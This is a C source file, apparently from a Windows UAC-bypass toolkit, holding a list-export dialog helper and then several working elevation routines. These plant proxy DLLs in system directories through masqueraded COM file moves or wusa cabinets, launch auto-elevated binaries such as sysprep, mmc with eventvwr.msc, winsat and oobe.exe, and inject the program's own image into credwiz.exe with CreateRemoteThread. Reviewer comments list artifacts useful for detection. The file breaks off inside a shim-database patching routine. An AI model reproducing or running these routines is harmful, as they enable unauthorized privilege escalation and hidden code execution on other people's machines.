/*
* SdtpWriteRowToFile
*
* Purpose:
*
* Render one list-view row into the file-scope `output` buffer and append it to lpFileName.
*
* Each cell is fetched with supGetItemText (heap string, freed here); cells are tab separated,
* except that column 1 is instead space-padded to a fixed width.
*
* NOTE(review): `output` is declared elsewhere and its capacity is not visible here; every
* _strcat into it is unbounded, so a row longer than that buffer would overflow it — confirm
* the capacity against the longest possible row (all columns plus padding and CRLF).
*
*/
static VOID SdtpWriteRowToFile(
    _In_ LPWSTR lpFileName,
    _In_ INT rowIndex
)
{
    INT columnIndex;
    SIZE_T textBytes, pad;
    LPWSTR cellText;

    output[0] = 0;

    for (columnIndex = 0; columnIndex < SdtDlgContext.lvColumnCount; columnIndex++) {

        textBytes = 0;
        cellText = supGetItemText(SdtDlgContext.ListView, rowIndex, columnIndex, &textBytes);
        if (cellText != NULL) {
            _strcat(output, cellText);
            HeapFree(GetProcessHeap(), 0, cellText);
        }

        if (columnIndex != 1) {
            _strcat(output, TEXT("\t"));
            continue;
        }

        // presumably textBytes is a byte count (it is divided by sizeof(WCHAR)) — pads column 1
        // out to 54 characters; a cell of 54 or more characters gets no padding at all
        for (pad = 54; pad > textBytes / sizeof(WCHAR); pad--) {
            _strcat(output, TEXT(" "));
        }
    }

    _strcat(output, L"\r\n");

    // append mode (last argument TRUE) — the file was created by the caller with the BOM
    supWriteBufferToFile(lpFileName, output, (INT)_strlen(output) * sizeof(WCHAR), FALSE, TRUE);
}

/*
* SdtSaveListToFile
*
* Purpose:
*
* Dump the dialog's list view to a user-selected UTF-16 text file.
*
* hwndDlg is the owner window for the save dialog and cursor capture.
* Default file name is list.txt; nothing is written if the dialog is cancelled.
* Return values of the file writes are not checked (best effort, as in the original).
*
*/
VOID SdtSaveListToFile(
    _In_ HWND hwndDlg
)
{
    WCHAR bom = (WCHAR)0xFEFF;
    INT rowIndex, rowCount;
    HCURSOR hPreviousCursor;
    HCURSOR hWaitCursor;
    WCHAR szFileName[MAX_PATH + 1];

    RtlSecureZeroMemory(szFileName, sizeof(szFileName));
    _strcpy(szFileName, TEXT("list.txt"));

    if (!supSaveDialogExecute(hwndDlg, (LPWSTR)&szFileName, TEXT("Text files\0*.txt\0\0"))) {
        return;
    }

    hWaitCursor = LoadCursorW(NULL, IDC_WAIT);

    // UTF-16 LE byte order mark goes first (non-append write), rows are appended afterwards
    supWriteBufferToFile(szFileName, &bom, sizeof(WCHAR), FALSE, FALSE);

    SetCapture(hwndDlg);
    hPreviousCursor = SetCursor(hWaitCursor);

    rowCount = ListView_GetItemCount(SdtDlgContext.ListView);
    for (rowIndex = 0; rowIndex < rowCount; rowIndex++) {
        SdtpWriteRowToFile(szFileName, rowIndex);
    }

    SetCursor(hPreviousCursor);
    ReleaseCapture();
}
/*
* ucmStandardAutoElevation2
*
* Purpose:
*
* Bypass UAC by abusing appinfo g_lpAutoApproveEXEList
*
* UAC contain whitelist of trusted fusion processes with only names and no other special restrictions
* Most of them unknown shit and list does not properly handled by system itself, use this fact.
*
* Parameters:
*   ProxyDll, ProxyDllSize - image bytes written to disk as the dropped DLL.
*
* Return: TRUE only if every step below succeeded and supRunProcess returned TRUE.
*
* On-disk / process artifacts produced by this routine (useful for detection):
*   <g_ctx.szTempDirectory>UNBCL_DLL        written, then moved into g_ctx.szSystemDirectory
*   <g_ctx.szTempDirectory>OOBE_EXE         copy of <system dir>SYSPREP_DIR SYSPREP_EXE, moved into the system directory
*   <g_ctx.szSystemDirectory>OOBE_EXE       launched via supRunProcess
*
* NOTE(review): unlike ucmCreateCabinetForSingleFile there is no NULL/zero check on
* ProxyDll/ProxyDllSize here; the parameters go straight to supWriteBufferToFile.
*
*/
BOOL ucmStandardAutoElevation2(
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    // cond stays FALSE, so the do/while runs exactly once; `break` is the early-exit path
    BOOL cond = FALSE, bResult = FALSE;
    WCHAR SourceFilePathAndName[MAX_PATH + 1];
    WCHAR DestinationFilePathAndName[MAX_PATH + 1];

    do {

        //source filename of dll
        RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
        _strcpy(SourceFilePathAndName, g_ctx.szTempDirectory);
        _strcat(SourceFilePathAndName, UNBCL_DLL);

        if (!supWriteBufferToFile(SourceFilePathAndName, ProxyDll, ProxyDllSize)) {
            break;
        }

        //copy %temp\unbcl.dll -> system32\unbcl.dll
        if (!ucmMasqueradedMoveFileCOM(SourceFilePathAndName, g_ctx.szSystemDirectory)) {
            break;
        }

        //source filename of process
        // SourceFilePathAndName is reused here: it now names the executable to copy
        RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
        _strcpy(SourceFilePathAndName, g_ctx.szSystemDirectory);
        _strcat(SourceFilePathAndName, SYSPREP_DIR);
        _strcat(SourceFilePathAndName, SYSPREP_EXE);

        RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
        _strcpy(DestinationFilePathAndName, g_ctx.szTempDirectory);
        _strcat(DestinationFilePathAndName, OOBE_EXE);

        //system32\sysprep\sysprep.exe -> temp\oobe.exe
        // bFailIfExists == FALSE: an existing temp copy is overwritten
        if (!CopyFile(SourceFilePathAndName, DestinationFilePathAndName, FALSE)) {
            break;
        }

        //temp\oobe.exe -> system32\oobe.exe
        if (!ucmMasqueradedMoveFileCOM(DestinationFilePathAndName, g_ctx.szSystemDirectory)) {
            break;
        }

        // final target path: the copy now sitting in the system directory
        RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
        _strcpy(DestinationFilePathAndName, g_ctx.szSystemDirectory);
        _strcat(DestinationFilePathAndName, OOBE_EXE);

        bResult = supRunProcess(DestinationFilePathAndName, NULL);

    } while (cond);

    return bResult;
}
/*
* ucmCreateCabinetForSingleFile
*
* Purpose:
*
* Build cabinet for usage in methods where required 1 file.
*
* Parameters:
*   lpSourceDll            - full path the DLL is written to; its file-name component becomes
*                            the name inside the cabinet (via _filename). Not NULL-checked.
*   ProxyDll, ProxyDllSize - bytes written to lpSourceDll; NULL / 0 returns FALSE immediately.
*
* Return: result of cabAddFile, or FALSE if the drop or cabCreate failed.
*
* Artifacts: lpSourceDll on disk, plus <g_ctx.szTempDirectory>ELLOCNAK_MSU (the cabinet).
*
*/
BOOL ucmCreateCabinetForSingleFile(
    LPWSTR lpSourceDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    // cond stays FALSE: single-pass do/while, `break` exits early
    BOOL cond = FALSE, bResult = FALSE;
    CABDATA *Cabinet = NULL;
    LPWSTR lpFileName;
    WCHAR szMsuFileName[MAX_PATH * 2];

    if ((ProxyDll == NULL) || (ProxyDllSize == 0)) {
        return FALSE;
    }

    do {

        //drop proxy dll
        if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
            break;
        }

        //build cabinet
        RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
        _strcpy(szMsuFileName, g_ctx.szTempDirectory);
        _strcat(szMsuFileName, ELLOCNAK_MSU);

        Cabinet = cabCreate(szMsuFileName);
        if (Cabinet == NULL)
            break;

        lpFileName = _filename(lpSourceDll);

        //put file without compression
        // cabClose runs whether or not cabAddFile succeeded; bResult carries cabAddFile's result
        bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
        cabClose(Cabinet);

    } while (cond);

    return bResult;
}
/*
* ucmH1N1Method
*
* Purpose:
*
* Bypass UAC by abusing OOBE.exe backdoor hardcoded in appinfo.dll
*
* Parameters:
*   ProxyDll, ProxyDllSize - DLL image dropped to disk; NULL / 0 returns FALSE.
*
* Return: TRUE if the remote thread was created (its own outcome is not inspected).
*
* What this routine does, in order (all visible below):
*   1. writes ProxyDll to TEMPDIR + "netutils.dll" and copies it to WBEMDIR via ucmAutoElevateCopyFile;
*   2. copies %systemroot%\system32\credwiz.exe to %temp%\oobe.exe and copies that to WBEMDIR too;
*   3. fills g_ElevParamsH1N1 (function pointers + target path/verb) for the remote code;
*   4. starts <system dir>\credwiz.exe with supRunProcessEx, allocates an RWX region of this
*      module's SizeOfImage in it, writes the whole current image there, and runs
*      ucmElevatedLaunchProc as a remote thread with the relocated g_ElevParamsH1N1 as its argument;
*   5. terminates the credwiz.exe child on every exit path once it was started.
*
* Artifacts for detection: the two files in %temp%, the two copies in WBEMDIR, a credwiz.exe child
* containing a PAGE_EXECUTE_READWRITE mapping of the calling image, and a CreateRemoteThread into it.
*
*/
BOOL ucmH1N1Method(
    PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    // cond stays FALSE: single-pass do/while, `break` exits early
    BOOL cond = FALSE, bResult = FALSE;
    DWORD c;                                            // receives the remote thread id
    HANDLE hProcess = NULL, hRemoteThread = NULL;
    HINSTANCE selfmodule = GetModuleHandle(NULL);       // base of the current executable image

    // walk our own PE headers: DOS header -> e_lfanew -> skip the 4-byte PE signature -> file header -> optional header
    PIMAGE_DOS_HEADER pdosh = (PIMAGE_DOS_HEADER)selfmodule;
    PIMAGE_FILE_HEADER fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD));
    PIMAGE_OPTIONAL_HEADER opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER));

    LPVOID remotebuffer = NULL, newEp, newDp;
    SIZE_T NumberOfBytesWritten = 0;
    PELOAD_PARAMETERS_4 elvpar = &g_ElevParamsH1N1;     // global so its RVA inside the image is known
    LPVOID elevproc = ucmElevatedLaunchProc;            // entry point for the remote thread, relocated below
    WCHAR szBuffer[MAX_PATH * 2];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szSource[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0)
        )
    {
        return bResult;
    }

    do {

        //put Fubuki dll as netutils to %temp%
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);                   // presumably an unexpanded "%temp%\" prefix — expanded just below
        _strcat_w(szBuffer, L"netutils.dll");
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }

        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            OutputDebugString(TEXT("[UCM] Failed to drop dll"));
            break;
        }
        else {
            OutputDebugStringW(TEXT("[UCM] Dll dropped successfully"));
        }

        //copy dll to wbem target folder
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        if (ExpandEnvironmentStringsW(WBEMDIR, szBuffer, MAX_PATH) == 0) {
            break;
        }

        //note: uacmAutoElevateCopyFile uses injection to explorer.exe
        bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
        if (!bResult) {
            break;
        }

        //copy 1st stage target process
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\credwiz.exe", szSource, MAX_PATH) == 0) {
            break;
        }

        RtlSecureZeroMemory(szDest, sizeof(szDest));
        if (ExpandEnvironmentStrings(L"%temp%\\oobe.exe", szDest, MAX_PATH) == 0) {
            break;
        }

        // bFailIfExists == FALSE: overwrites an existing %temp%\oobe.exe
        if (!CopyFile(szSource, szDest, FALSE)) {
            break;
        }

        // szBuffer still holds the expanded WBEMDIR from above
        bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
        if (!bResult) {
            break;
        }

        //setup basic shellcode routines
        // the remote thread cannot rely on this process's import table, so the needed
        // function pointers are resolved here and handed over inside g_ElevParamsH1N1
        RtlSecureZeroMemory(&g_ElevParamsH1N1, sizeof(g_ElevParamsH1N1));
        elvpar->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ldp.hShell32, "ShellExecuteExW");
        elvpar->xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(g_ldp.hKernel32, "WaitForSingleObject");
        elvpar->xCloseHandle = (pfnCloseHandle)GetProcAddress(g_ldp.hKernel32, "CloseHandle");

        //set shellcode 2nd stage target process
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(elvpar->szTargetApp, g_ldp.szSystemDirectory);
        //c:\windows\system32\wbem\oobe.exe
        _strcat_w(elvpar->szTargetApp, L"\\wbem\\oobe.exe");
        _strcpy_w(elvpar->szVerb, L"runas");

        _strcpy_w(szBuffer, g_ldp.szSystemDirectory);
        //c:\windows\system32\credwiz.exe
        _strcat_w(szBuffer, L"\\credwiz.exe");

        //run 1st stage target process
        hProcess = supRunProcessEx(szBuffer, NULL, NULL);
        if (hProcess == NULL) {
            OutputDebugString(TEXT("[UCM] Cannot open target process."));
            break;
        }

        // one RWX region large enough for the whole current image
        remotebuffer = VirtualAllocEx(hProcess, NULL, (SIZE_T)opth->SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (remotebuffer == NULL) {
            OutputDebugString(TEXT("[UCM] Cannot allocate memory in target process."));
            break;
        }

        // raw copy of our own mapped image; NumberOfBytesWritten is not compared against SizeOfImage afterwards
        if (!WriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &NumberOfBytesWritten)) {
            OutputDebugString(TEXT("[UCM] Cannot write to the target process memory."));
            break;
        }

        // rebase entry point and parameter block: same offset from the image base, new base
        newEp = (char *)remotebuffer + ((char *)elevproc - (char *)selfmodule);
        newDp = (char *)remotebuffer + ((char *)elvpar - (char *)selfmodule);

        hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c);
        bResult = (hRemoteThread != NULL);
        if (bResult) {
            // waits indefinitely; the thread's exit code is not read
            WaitForSingleObject(hRemoteThread, INFINITE);
            CloseHandle(hRemoteThread);
        }

    } while (cond);

    // the 1st stage process is only a host; it is killed regardless of outcome
    if (hProcess != NULL) {
        TerminateProcess(hProcess, 0);
        CloseHandle(hProcess);
    }

    return bResult;
}
/*
* ucmMMCMethod
*
* Purpose:
*
* Bypass UAC by abusing MMC.exe backdoor hardcoded in appinfo.dll
*
* Parameters:
*   lpTargetDll            - file name of the DLL to drop (appended to TEMPDIR); rejected if NULL
*                            or longer than 100 characters, which keeps the MAX_PATH buffers safe.
*   ProxyDll, ProxyDllSize - bytes written to that file; NULL / 0 returns FALSE.
*
* Return: result of supRunProcess, or FALSE on any earlier failure.
*
* Artifacts: <expanded TEMPDIR>lpTargetDll on disk, a copy of it in the expanded SYSTEMROOTDIR
* (via ucmAutoElevateCopyFile), and an mmc.exe process started with "eventvwr.msc".
*
*/
BOOL ucmMMCMethod(
    LPWSTR lpTargetDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    // cond stays FALSE: single-pass do/while, `break` exits early
    BOOL bResult = FALSE, cond = FALSE;
    WCHAR szSource[MAX_PATH + 1];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szBuffer[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0) ||
        (lpTargetDll == NULL)
        )
    {
        return bResult;
    }

    // length cap so TEMPDIR + lpTargetDll cannot overrun szBuffer[MAX_PATH + 1]
    if (_strlen_w(lpTargetDll) > 100) {
        return bResult;
    }

    do {

        //put target dll
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);
        _strcat_w(szBuffer, lpTargetDll);

        //expand string for proxy dll
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }

        //write proxy dll to disk
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            OutputDebugString(TEXT("[UCM] Failed to drop dll"));
            break;
        }
        else {
            OutputDebugStringW(TEXT("[UCM] Dll dropped successfully"));
        }

        //expand string for target dir
        RtlSecureZeroMemory(szDest, sizeof(szDest));
        if (ExpandEnvironmentStringsW(SYSTEMROOTDIR, szDest, MAX_PATH) == 0) {
            break;
        }

        //drop fubuki to system32
        bResult = ucmAutoElevateCopyFile(szSource, szDest);
        if (!bResult) {
            break;
        }

        //run mmc console
        //because of mmc harcoded backdoor uac will autoelevate mmc with valid and trusted MS command
        //event viewer will attempt to load not existing dll, so we will give him our little friend
        // the dropped file in %temp% is not deleted by this routine
        bResult = supRunProcess(L"mmc.exe", L"eventvwr.msc");

    } while (cond);

    return bResult;
}
/*
* ucmWinSATMethod
*
* Purpose:
*
* Acquire elevation through abusing APPINFO.DLL whitelisting model logic and wusa installer/IFileOperation autoelevation.
* Slightly modified target and proxydll can work almost with every autoelevated/whitelisted application.
* This method uses advantage of wusa to write to the protected folders, but can be adapted to IFileOperation too.
* WinSAT used for demonstration purposes only.
*
* Parameters:
*   lpTargetDll            - file name of the DLL to drop (appended to TEMPDIR); rejected if NULL
*                            or longer than 100 characters.
*   ProxyDll, ProxyDllSize - bytes written to that file; NULL / 0 returns FALSE.
*   UseWusa                - TRUE: pack the DLL and the winsat.exe copy into a cabinet and hand it to
*                            ucmWusaExtractPackage; FALSE: copy both with ucmAutoElevateCopyFile instead.
*
* Return: result of the final supRunProcess, or FALSE on any earlier failure.
*
* Artifacts: %temp%\winsat.exe (copy of the system binary), <expanded TEMPDIR>lpTargetDll, the cabinet
* named by T_MSUPACKAGE_NAME when UseWusa, copies of both files in the target directory, and a process
* started from the expanded T_WINSAT_TARGET. The two %temp% files are deleted on exit; the cabinet and
* the copies in the target directory are not (see the trailing comment in the else branch).
*
*/
BOOL ucmWinSATMethod(
    LPWSTR lpTargetDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize,
    BOOL UseWusa
)
{
    // cond stays FALSE: single-pass do/while, `break` exits early
    BOOL bResult = FALSE, cond = FALSE;
    CABDATA *Cabinet = NULL;
    WCHAR szSource[MAX_PATH + 1];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szBuffer[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0) ||
        (lpTargetDll == NULL)
        )
    {
        return bResult;
    }

    // length cap so TEMPDIR + lpTargetDll cannot overrun szBuffer[MAX_PATH + 1]
    if (_strlen_w(lpTargetDll) > 100) {
        return bResult;
    }

    // zeroed up front: the cleanup at the bottom tests szDest[0]/szSource[0] to decide what to delete
    RtlSecureZeroMemory(szSource, sizeof(szSource));
    RtlSecureZeroMemory(szDest, sizeof(szDest));

    do {

        if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\winsat.exe", szSource, MAX_PATH) == 0) {
            break;
        }

        if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe", szDest, MAX_PATH) == 0) {
            break;
        }

        // Copy winsat to temp directory
        // bFailIfExists == FALSE: an existing %temp%\winsat.exe is overwritten
        if (!CopyFile(szSource, szDest, FALSE)) {
            break;
        }

        //put target dll
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);
        _strcat_w(szBuffer, lpTargetDll);

        //expand string for proxy dll
        // szSource is reused: from here on it is the dropped DLL, not the system winsat.exe
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }

        //write proxy dll to disk
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            OutputDebugString(TEXT("[UCM] Failed to drop dll"));
            break;
        }
        else {
            OutputDebugStringW(TEXT("[UCM] Dll dropped successfully"));
        }

        //
        // Two options: use wusa installer or IFileOperation
        //
        if ( UseWusa ) {

            //build cabinet
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME, szBuffer, MAX_PATH) == 0) {
                break;
            }

            Cabinet = cabCreate(szBuffer);
            if (Cabinet) {

                //expand string for winsat.exe
                // a break here leaves Cabinet non-NULL; it is closed by the `if (Cabinet)` after the loop
                if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe", szDest, MAX_PATH) == 0) {
                    break;
                }

                //put proxy dll inside cabinet
                // NOTE(review): both cabAddFile results are ignored; a failed add is only noticed when
                // the extracted package is missing a file
                cabAddFile(Cabinet, szSource, lpTargetDll);
                //put winsat.exe
                cabAddFile(Cabinet, szDest, L"winsat.exe");

                cabClose(Cabinet);
                Cabinet = NULL;
            }
            else {
                OutputDebugString(TEXT("[UCM] Error creating cab archive"));
                break;
            }

            //extract package
            // return value (if any) is not checked
            ucmWusaExtractPackage(T_WINSAT_CMDLINE);

            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0) {
                break;
            }

            bResult = supRunProcess(szBuffer, NULL);
        }
        else {

            //wusa extract banned, switch to IFileOperation.
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStringsW(M1W7_TARGETDIR, szBuffer, MAX_PATH) == 0) {
                break;
            }

            bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
            if (!bResult) {
                break;
            }

            bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
            if (!bResult) {
                break;
            }

            // yields the time slice only; no real delay
            Sleep(0);

            //run winsat
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0) {
                break;
            }

            bResult = supRunProcess(szBuffer, NULL);

            //cleanup of the above files must be done by payload code
        }

    } while (cond);

    // only non-NULL if the UseWusa branch broke out between cabCreate and cabClose
    if (Cabinet) {
        cabClose(Cabinet);
    }

    //remove trash from %temp%
    if (szDest[0] != 0) {
        DeleteFileW(szDest);
    }
    if (szSource[0] != 0) {
        DeleteFileW(szSource);
    }

    return bResult;
}
/*
* ucmStandardAutoElevation
*
* Purpose:
*
* Leo Davidson AutoElevation method with derivatives.
*
* M1W7 - Original Leo Davidson concept.
* M1W8 - Windows 8.1 adapted M1W7 (bypassing sysprep embedded manifest dlls redirection).
* M1W7T - Leo Davidson concept with different target dll, used by Win32/Tilon.
* M1W10 - Windows 10 adapter M1W7.
* M1WALL - WinNT/Pitou derivative from Leo Davidson concept.
*
* Parameters:
*   dwType                 - one of METHOD_SYSPREP1/2/3, METHOD_OOBE, METHOD_TILON; anything else
*                            returns FALSE before touching the disk.
*   ProxyDll, ProxyDllSize - bytes written to the expanded source-DLL path. Not NULL-checked here.
*
* Return: result of ucmInjectExplorer, or FALSE on any earlier failure.
*
* This revision selects paths from the M1W* macros and fills the global g_ElevParams (paths,
* IFileOperation IIDs/CLSID, an elevation moniker and resolved ole32/shell32/kernel32 entry
* points) for ucmElevatedLoadProc, which ucmInjectExplorer runs inside explorer.exe.
* A later revision of the same function (UACBYPASSMETHOD parameter) also appears in this file.
*
* Artifacts: the dropped DLL at the expanded lpSourceDll path, and the file operation / process
* start that ucmElevatedLoadProc performs in explorer.exe (not visible here).
*
*/
BOOL ucmStandardAutoElevation(
    DWORD dwType,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    // cond stays FALSE: single-pass do/while, `break` exits early
    BOOL cond = FALSE, bResult = FALSE;
    HINSTANCE hKrnl, hOle32, hShell32;
    LPWSTR lpSourceDll, lpTargetDir, lpTargetProcess;
    WCHAR szBuffer[MAX_PATH + 1];

    // pick the (unexpanded) source DLL, destination directory and target executable per method
    switch (dwType) {

    case METHOD_SYSPREP1:
        lpSourceDll = M1W7_SOURCEDLL;
        lpTargetDir = M1W7_TARGETDIR;
        lpTargetProcess = M1W7_TARGETPROCESS;
        break;

    case METHOD_SYSPREP2:
        lpSourceDll = M1W8_SOURCEDLL;
        lpTargetDir = M1W7_TARGETDIR;
        lpTargetProcess = M1W7_TARGETPROCESS;
        break;

    case METHOD_SYSPREP3:
        lpSourceDll = M1W10_SOURCEDLL;
        lpTargetDir = M1W7_TARGETDIR;
        lpTargetProcess = M1W7_TARGETPROCESS;
        break;

    case METHOD_OOBE:
        lpSourceDll = M1WALL_SOURCEDLL;
        lpTargetDir = M1WALL_TARGETDIR;
        lpTargetProcess = M1WALL_TARGETPROCESS;
        break;

    case METHOD_TILON:
        lpSourceDll = M1W7T_SOURCEDLL;
        lpTargetDir = M1W7_TARGETDIR;
        lpTargetProcess = M1W7_TARGETPROCESS;
        break;

    default:
        return FALSE;
    }

    do {

        // load/reference required dlls
        // NOTE(review): hKrnl is not NULL-checked like hOle32/hShell32 are; GetProcAddress(NULL, ...)
        // below would then yield NULL function pointers in g_ElevParams
        hKrnl = GetModuleHandle(KERNEL32DLL);

        hOle32 = GetModuleHandle(OLE32DLL);
        if (hOle32 == NULL) {
            hOle32 = LoadLibrary(OLE32DLL);
            if (hOle32 == NULL) {
                break;
            }
        }

        hShell32 = GetModuleHandle(SHELL32DLL);
        if (hShell32 == NULL) {
            hShell32 = LoadLibrary(SHELL32DLL);
            if (hShell32 == NULL) {
                break;
            }
        }

        //source filename
        if (ExpandEnvironmentStringsW(lpSourceDll, g_ElevParams.SourceFilePathAndName, MAX_PATH) == 0) {
            break;
        }
        OutputDebugStringW(g_ElevParams.SourceFilePathAndName);

        if (!supWriteBufferToFile(g_ElevParams.SourceFilePathAndName, ProxyDll, ProxyDllSize)) {
            break;
        }

        //dest directory
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, lpTargetDir);
        if (ExpandEnvironmentStringsW(szBuffer, g_ElevParams.DestinationDir, MAX_PATH) == 0) {
            break;
        }
        OutputDebugStringW(g_ElevParams.DestinationDir);

        //target
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, lpTargetProcess);
        if (ExpandEnvironmentStringsW(szBuffer, g_ElevParams.ExePathAndName, MAX_PATH) == 0) {
            break;
        }
        OutputDebugStringW(g_ElevParams.ExePathAndName);

        //elevation moniker
        // the GUID in the moniker is the same class assigned to xCLSID two lines down (FileOperation)
        _strcpy_w(g_ElevParams.EleMoniker, L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}");

        g_ElevParams.xIID = IID_IFileOperation;
        g_ElevParams.xIID_IShellItem = IID_IShellItem;
        g_ElevParams.xCLSID = CLSID_FileOperation;

        // resolved here because the code that consumes g_ElevParams runs in another process
        g_ElevParams.xCoInitialize = (pfnCoInitialize)GetProcAddress(hOle32, "CoInitialize");
        g_ElevParams.xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(hOle32, "CoCreateInstance");
        g_ElevParams.xCoGetObject = (pfnCoGetObject)GetProcAddress(hOle32, "CoGetObject");
        g_ElevParams.xCoUninitialize = (pfnCoUninitialize)GetProcAddress(hOle32, "CoUninitialize");
        g_ElevParams.xSHCreateItemFromParsingName = (pfnSHCreateItemFromParsingName)GetProcAddress(hShell32, "SHCreateItemFromParsingName");
        g_ElevParams.xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(hShell32, "ShellExecuteExW");
        g_ElevParams.xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(hKrnl, "WaitForSingleObject");
        g_ElevParams.xCloseHandle = (pfnCloseHandle)GetProcAddress(hKrnl, "CloseHandle");

        // none of the GetProcAddress results above are validated before hand-off
        bResult = ucmInjectExplorer(&g_ElevParams, ucmElevatedLoadProc);

    } while (cond);

    return bResult;
}
/*
* ucmShimPatch
*
* Purpose:
*
* Build, register shim patch database and execute target app with forced Entry Point Override.
* Aside from UAC bypass this is also dll injection technique.
*
* Parameters:
*   ProxyDll, ProxyDllSize - bytes written to <temp path>r3.dll. Not NULL-checked.
*
* Return: result of ucmRegisterAndRunTarget, or FALSE on any earlier failure.
*
* Database layout written below (SDB tag nesting):
*   DATABASE { NAME, DATABASE_ID, OS_PLATFORM,
*              LIBRARY { PATCH { NAME, PATCH_BITS } },
*              EXE { NAME, APP_NAME, EXE_ID, MATCHING_FILE { NAME, COMPANY_NAME }, PATCH_REF { NAME, PATCH_TAGID } } }
* PATCH_BITS holds one PATCH_REPLACE record: patchcode32 applied at the entry-point RVA of
* SHIMPATCH_EXENAME as read from the copy in the system directory.
*
* Artifacts: <temp path>r3.dll, <temp path>amuzani.sdb, a database named "amuzani" installed through
* the sdbinst path built from SHIM_SDBINSTALLER, and a process started from "%ws\\iscsicli.exe"
* (formatted with the system directory by ucmRegisterAndRunTarget).
*
* NOTE(review): once SdbCreateDatabase has succeeded, the failure breaks (SdbDeclareIndex,
* SdbStartIndexing, SdbWriteStringTag, epRVA == 0) leave hpdb open — SdbCloseDatabaseWrite is only
* reached on the success path. A HeapAlloc failure silently produces a PATCH entry without PATCH_BITS.
*
*/
BOOL ucmShimPatch(
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    // cond stays FALSE: single-pass do/while, `break` exits early
    BOOL bResult = FALSE, cond = FALSE;
    PDB hpdb;
    GUID dbGUID, exeGUID;
    WCHAR szTempDirectory[MAX_PATH * 2];
    WCHAR szShimDbPath[MAX_PATH * 2];
    WCHAR szSdbinstPath[MAX_PATH * 2];
    WCHAR szSystemDirectory[MAX_PATH];
    DWORD indexid = MAXDWORD, sz, epRVA = 0;
    TAGID dbrf, libref, patchref, exeref, matchfileref, patchfileref;
    PBYTE tmp;
    PPATCHBITS patchbits;

    RtlSecureZeroMemory(szSdbinstPath, sizeof(szSdbinstPath));
    RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));

    do {

        if (!GetSystemDirectoryW(szSystemDirectory, MAX_PATH)) {
            break;
        }

        // SHIM_SDBINSTALLER is a format string taking the system directory
        wsprintfW(szSdbinstPath, SHIM_SDBINSTALLER, szSystemDirectory);

        // fresh GUIDs for the database and the EXE entry
        if (CoCreateGuid(&dbGUID) != S_OK) {
            break;
        }
